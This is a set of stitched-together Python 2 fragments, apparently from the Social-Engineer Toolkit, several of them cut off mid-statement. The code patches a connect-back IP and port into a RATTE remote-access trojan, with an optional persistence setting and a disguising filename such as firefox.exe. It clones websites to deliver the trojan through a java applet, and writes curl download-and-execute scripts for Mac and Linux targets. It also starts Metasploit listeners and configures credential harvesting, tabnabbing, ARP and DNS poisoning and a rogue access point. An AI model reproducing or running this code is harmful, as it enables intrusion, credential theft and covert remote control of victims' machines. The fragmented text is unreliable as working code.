def main():
############
# get User Input
############
ipaddr = raw_input(
core.setprompt(["9", "2"], "IP address to connect back on"))
try:
ratteport = int(
raw_input(
core.setprompt(["9", "2"],
"Port RATTE Server should listen on")))
while ratteport == 0 or ratteport > 65535:
core.PrintWarning('Port must not be equal to javaport!')
ratteport = int(
raw_input(
core.setprompt(
["9", "2"],
"Enter port RATTE Server should listen on")))
except ValueError:
ratteport = 8080
persistent = raw_input(
core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
if persistent == "no" or persistent == "" or persistent == "n":
persistent = "NO"
else:
persistent = "YES"
customexe = raw_input(
core.setprompt([
"9", "2"
], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
############
# prepare RATTE
############
prepare_ratte(ipaddr, ratteport, persistent, customexe)
core.PrintStatus(
"Payload has been exported to src/program_junk/ratteM.exe")
############
# start ratteserver
############
prompt = raw_input(
core.setprompt(["9", "2"],
"Start the ratteserver listener now [yes|no]"))
if prompt == "yes" or prompt == "" or prompt == "y":
core.PrintInfo("Starting ratteserver...")
ratte_listener_start(ratteport)
def start_web_server_tw(directory, port):
global httpd
try:
# import the threading, socketserver, and simplehttpserver
import thread, SocketServer, SimpleHTTPServer
# create the httpd handler for the simplehttpserver
# we set the allow_reuse_address incase something hangs can still bind to port
class ReusableTCPServer(SocketServer.TCPServer):
allow_reuse_address = True
# specify the httpd service on 0.0.0.0 (all interfaces) on port 80
httpd = ReusableTCPServer(("0.0.0.0", port),
SimpleHTTPServer.SimpleHTTPRequestHandler)
# thread this mofo
thread.start_new_thread(httpd.serve_forever, ())
# change directory to the path we specify for output path
os.chdir(directory)
# handle keyboard interrupts
except KeyboardInterrupt:
core.PrintInfo("Exiting the SET web server...")
httpd.socket.close()
def prepare_ratte(ipaddr, ratteport, persistent, customexe):
core.PrintInfo("preparing RATTE...")
# replace ipaddress with one that we need for reverse connection back
############
#Load content of RATTE
############
fileopen = open("src/payloads/ratte/ratte.binary", "rb")
data = fileopen.read()
fileopen.close()
############
#PATCH Server IP into RATTE
############
filewrite = open("src/program_junk/ratteM.exe", "wb")
host = int(len(ipaddr) + 1) * "X"
rPort = int(len(str(ratteport)) + 1) * "Y"
pers = int(len(str(persistent)) + 1) * "Z"
#check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
if len(str(customexe)) > 0:
cexe = int(len(str(customexe)) + 1) * "Q"
else:
cexe = ""
filewrite.write(
data.replace(str(cexe), customexe + "\x00",
1).replace(str(pers), persistent + "\x00",
1).replace(str(host), ipaddr + "\x00",
1).replace(str(rPort),
str(ratteport) + "\x00",
1))
# filewrite.write(data.replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
#filewrite.write(data.replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
filewrite.close()
def main():
#pause=raw_input("This module has finished completing. Press <enter> to continue")
website = raw_input(
core.setprompt(["9", "2"],
"Enter website to clone (ex. https://gmail.com)"))
ipaddr = raw_input(
core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
#javaport must be 80, cause applet uses in web injection port 80 to download payload!
try:
javaport = int(
raw_input(
core.setprompt(["9", "2"],
"Port java applet should listen on (ex. 443)")))
while javaport == 0 or javaport > 65535:
javaport = int(
raw_input(
core.setprompt(["9", "2"],
"Enter port java applet should listen on")))
except ValueError:
javaport = 80
#javaport=80
try:
ratteport = int(
raw_input(
core.setprompt(["9", "2"],
"Port RATTE Server should listen on")))
while ratteport == javaport or ratteport == 0 or ratteport > 65535:
core.PrintWarning("Port must not be equal to javaport!")
ratteport = int(
raw_input(
core.setprompt(["9", "2"],
"Port RATTE Server should listen on")))
except ValueError:
ratteport = 8080
persistent = raw_input(
core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
if persistent == "no" or persistent == "" or persistent == "n":
persistent = "NO"
else:
persistent = "YES"
customexe = raw_input(
core.setprompt([
"9", "2"
], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
#if persistent == "no" or persistent == "" or persistent == "n":
# persistent="NO"
#else:
# persistent="YES"
#######################################
# prepare RATTE
#######################################
prepare_ratte(ipaddr, ratteport, persistent, customexe)
######################################
# Java Applet Attack to deploy RATTE
#######################################
core.PrintInfo("Starting java applet attack...")
java_applet_attack_tw(website, javaport, "reports/", ipaddr)
fileopen = file("%s/src/program_junk/rand_gen" % (definepath), "r")
for line in fileopen:
ratte_random = line.rstrip()
subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" %
(definepath, definepath, ratte_random),
shell=True).wait()
#######################
# start ratteserver
#######################
core.PrintInfo("Starting ratteserver...")
ratte_listener_start(ratteport)
######################
# stop webserver
######################
stop_web_server_tw()
#!/usr/bin/python
import subprocess
import os
import re
import sys
from src.core import setcore
# definepath
definepath = os.getcwd()
sys.path.append(definepath)
meta_path = setcore.meta_path()
# launch msf listener
setcore.PrintInfo("The payload can be found in the SET home directory.")
choice = raw_input(setcore.setprompt("0", "Start the listener now? [yes|no]"))
if choice == "yes" or choice == "y":
# if we didn't select the SET interactive shell as our payload
if not os.path.isfile("src/program_junk/set.payload"):
setcore.PrintInfo(
"Please wait while the Metasploit listener is loaded...")
subprocess.Popen(
"ruby %s/msfconsole -L -n -r src/program_junk/meta_config" %
(meta_path),
shell=True).wait()
# if we did select the set payload as our option
if os.path.isfile("src/program_junk/set.payload"):
fileopen = file("src/program_junk/port.options", "r")
set_payload = file("src/program_junk/set.payload", "r")
if match3: dnsspoof_path = line.replace("DNSSPOOF_PATH=", "")
if not os.path.isfile(dnsspoof_path):
if os.path.isfile("/usr/local/sbin/dnsspoof"):
dnsspoof_path = "/usr/local/sbin/dnsspoof"
else:
setcore.PrintWarning(
"DNSSpoof was not found. Please install or correct path in set_config. Exiting...."
)
ExitSet()
if not os.path.isfile(airbase_path):
airbase_path = "src/wireless/airbase-ng"
setcore.PrintInfo(
"For this attack to work properly, we must edit the dhcp3-server file to include our wireless interface."
)
setcore.PrintInfo(
"""This will allow dhcp3 to properly assign IPs. (INTERFACES="at0")""")
print("")
setcore.PrintStatus("SET will now launch nano to edit the file.")
setcore.PrintStatus(
"Press ^X to exit nano and don't forget to save the updated file!")
setcore.PrintWarning(
"If you receive an empty file in nano, please check the path of your dhcp3-server file!"
)
setcore.ReturnContinue()
subprocess.Popen("nano /etc/default/dhcp3-server", shell=True).wait()
# DHCP SERVER CONFIG HERE
dhcp_config1 = ("""
subprocess.Popen(
"cp src/program_junk/msf.exe src/program_junk/web_clone/msf.exe",
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
if payload_selection == "SETSHELL":
subprocess.Popen(
"cp src/payloads/set_payloads/shell.windows src/program_junk/web_clone/x",
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True)
# if we are targetting nix
if posix == True:
setcore.PrintInfo(
"Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload..."
)
filewrite = file("%s/src/program_junk/web_clone/mac.bin" % (definepath),
"w")
payload_flags = webserver.split(" ")
# grab osx binary name
osx_name = setcore.generate_random_string(10, 10)
downloader = "#!/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (
payload_flags[1], osx_name, osx_name, osx_name, payload_flags[1],
payload_flags[2])
filewrite.write(downloader)
filewrite.close()
# grab nix binary name
linux_name = setcore.generate_random_string(10, 10)
downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (
payload_flags[1], linux_name, linux_name, linux_name, payload_flags[1],
# prompt the user to import the code signing certificate
cert_path = raw_input(
core.setprompt("0", "Path to the code signing certificate file"))
if not os.path.isfile(cert_path):
# loop forever
while 1 == 1:
core.PrintError("ERROR:Filename not found. Try again.")
# re-prompt if we didn't file the filename
cert_path = raw_input(
core.setprompt("0", "Path to the .cer certificate file"))
# if we find the filename then break out of loop
if os.path.isfile(cert_path): break
# here is where we import the certificate
try:
core.PrintInfo("Importing the certificate into SET...")
subprocess.Popen("keytool -import -alias MyCert -file %s" %
(cert_path),
shell=True).wait()
# trigger that we have our certificate already and bypass the request process below
use_flag = 1
# exception here in case it was already imported before
except:
pass
# this will exit the menu
if prompt == "quit" or prompt == "q":
use_flag = 0
prompt = "yes"
filewrite.write(attack_vector)
filewrite.close()
# specify browser exploits
if attack_vector == '2':
attack_vector = "browser"
filewrite.write(attack_vector)
filewrite.close()
if attack_vector == '': attack_vector = '3'
# specify web harvester method
if attack_vector == '3':
attack_vector = "harvester"
filewrite.write(attack_vector)
filewrite.close()
setcore.PrintInfo("Email harvester will allow you to utilize the clone capabilities within SET")
setcore.PrintInfo("to harvest credentials or parameters from a website as well as place them into a report")
# specify tab nabbing attack vector
if attack_vector == '4':
attack_vector = "tabnabbing"
filewrite.write(attack_vector)
filewrite.close()
# specify man left int he middle attack vector
if attack_vector == '5':
attack_vector = "mlitm"
filewrite.write(attack_vector)
filewrite.close()
# specify webjacking attack vector
definepath = os.getcwd()
# grab config file
config = file("config/set_config", "r").readlines()
# grab our default directory
cwd = os.getcwd()
# set a variable as default to n or no
ettercapchoice = 'n'
# add dsniffchoice
dsniffchoice = 'n'
for line in config:
# check for ettercap choice here
match1 = re.search("ETTERCAP=ON", line)
if match1:
setcore.PrintInfo("ARP Cache Poisoning is set to " +
core.bcolors.GREEN + "ON" + core.bcolors.ENDC)
ettercapchoice = 'y'
# check for dsniff choice here
match2 = re.search("DSNIFF=ON", line)
if match2:
setcore.PrintInfo("DSNIFF DNS Poisoning is set to " +
setcore.bcolors.GREEN + "ON" + setcore.bcolors.ENDC)
dsniffchoice = 'y'
ettercapchoice = 'n'
# GRAB CONFIG from SET
fileopen = file("config/set_config", "r").readlines()
for line in fileopen:
# grab the ettercap interface
match = re.search("ETTERCAP_INTERFACE=", line)